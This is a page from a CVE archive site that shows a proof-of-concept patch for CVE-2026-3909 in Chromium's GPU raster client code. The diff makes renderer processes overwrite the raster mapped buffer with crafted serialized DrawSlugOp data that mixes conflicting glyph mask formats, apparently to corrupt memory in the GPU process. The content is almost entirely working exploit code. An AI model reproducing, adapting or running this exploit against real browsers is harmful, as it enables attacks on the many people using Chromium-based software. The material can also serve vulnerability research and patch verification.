5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-3909
README.md
Rendering markdown...
POC / raster_implementation.cc.patch PATCH
⬇ Raw GitHub ✕ Close 
diff --git a/gpu/command_buffer/client/raster_implementation.cc b/gpu/command_buffer/client/raster_implementation.cc
index 89742900039a6..cbd9e5a974ee0 100644
--- a/gpu/command_buffer/client/raster_implementation.cc
+++ b/gpu/command_buffer/client/raster_implementation.cc
@@ -50,6 +50,9 @@
 #include "ui/gfx/geometry/rect.h"
 #include "ui/gfx/geometry/rect_f.h"
 
+
+#include "base/command_line.h"
+
 #if defined(GPU_CLIENT_DEBUG)
 #define GPU_CLIENT_SINGLE_THREAD_CHECK() SingleThreadChecker checker(this);
 #else  // !defined(GPU_CLIENT_DEBUG)
@@ -1110,8 +1113,114 @@ base::span<uint8_t> RasterImplementation::MapFontBuffer(uint32_t size) {
   return font_mapped_buffer_->as_byte_span();
 }
 
+// patch code
+bool IsRendererProcess(){
+  const char kProcessType[] = "type";
+  const char kRendererProcess[] = "renderer";
+  return base::CommandLine::ForCurrentProcess()->GetSwitchValueASCII(
+        kProcessType) == kRendererProcess;
+}
+
 void RasterImplementation::UnmapRasterCHROMIUM(uint32_t raster_written_size,
                                                uint32_t total_written_size) {
+  // patch code
+  if(IsRendererProcess()){
+    RasterImplementation* ri = this;
+    unsigned char* addr = (unsigned char*)(ri->raster_mapped_buffer_->address());
+    printf("[*] POC start execute UnmapRasterCHROMIUM type: %d\n", addr[0]);
+  
+#ifndef PocMaskFormat
+    enum class PocMaskFormat : int {
+      kA8,    //!< 1-byte per pixel
+      kA565,  //!< 2-bytes per pixel, RGB represent 3-channel LCD coverage
+      kARGB,  //!< 4-bytes per pixel, color format
+
+      kLast = kARGB
+    };
+#endif
+#ifndef PocFormat
+    enum PocFormat : uint8_t {
+      kBW_Format, //!< 1bit per pixel mask (e.g. monochrome)
+      kA8_Format, //!< 8bits per pixel mask (e.g. antialiasing)
+      k3D_Format, //!< 3 8bit per pixl planes: alpha, mul, add
+      kARGB32_Format,         //!< SkPMColor
+      kLCD16_Format,          //!< 565 alpha for r/g/b
+      kSDF_Format,            //!< 8bits representing signed distance field
+    };
+#endif
+
+    unsigned char serialized_data[] = {
+      // Header data 4 bytes
+      0x16, 0x30, 0x01, 0x00,   
+      // DrawSlugOp serialized data
+      // Op flags 52 bytes
+      0xf9, 0xf7, 0x77, 0x3f, 0xf9, 0xf7, 0x77, 0x3f, 0xf9, 0xf7, 0x77, 0x3f, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x40, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x80, 0xbf,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00,
+      // Op count 4 bytes
+      0x01, 0x00, 0x00, 0x00,
+      // Op slug size 8 bytes
+      0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      // Op slug 236 bytes
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, 0x00, 0x41,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41,
+      0x00, 0x00, 0x00, 0x41, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x86, 0x07, 0xc2, 0x42, 0x4c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x63, 0x65, 0x72, 0x73,
+      0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x80, 0x41, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x10, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x99, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+
+      // Header data 4 bytes
+      0x16, 0x30, 0x01, 0x00,   
+      // DrawSlugOp serialized data
+      // Op flags 52 bytes
+      0xf9, 0xf7, 0x77, 0x3f, 0xf9, 0xf7, 0x77, 0x3f, 0xf9, 0xf7, 0x77, 0x3f, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x40, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x80, 0xbf,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00,
+      // Op count 4 bytes
+      0x01, 0x00, 0x00, 0x00,
+      // Op slug size 8 bytes
+      0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      // Op slug 236 bytes
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, 0x00, 0x41,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f,
+      0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41,
+      0x00, 0x00, 0x00, 0x41, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x86, 0x07, 0xc2, 0x42, 0x4c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x63, 0x65, 0x72, 0x73,
+      0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x80, 0x41, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x10, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x99, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+    };
+
+    UNSAFE_TODO(unsigned char* kDrawSlugOp1 = &serialized_data[0x44]);
+    UNSAFE_TODO(unsigned char* kDrawSlugOp2 = &serialized_data[0x130+0x44]);
+
+    UNSAFE_TODO(kDrawSlugOp1[0xd8] = PocFormat::kARGB32_Format);
+    UNSAFE_TODO(kDrawSlugOp1[0xe0] = 0x99);
+    UNSAFE_TODO(kDrawSlugOp1[0x48] = (unsigned char)PocMaskFormat::kARGB);
+    UNSAFE_TODO(kDrawSlugOp2[0x48] = (unsigned char)PocMaskFormat::kA8);
+    UNSAFE_TODO(memcpy(addr, serialized_data, sizeof(serialized_data)));
+    
+  }
+
+  // origin code
   if (!raster_mapped_buffer_) {
     SetGLError(GL_INVALID_OPERATION, "glUnmapRasterCHROMIUM", "not mapped");
     return;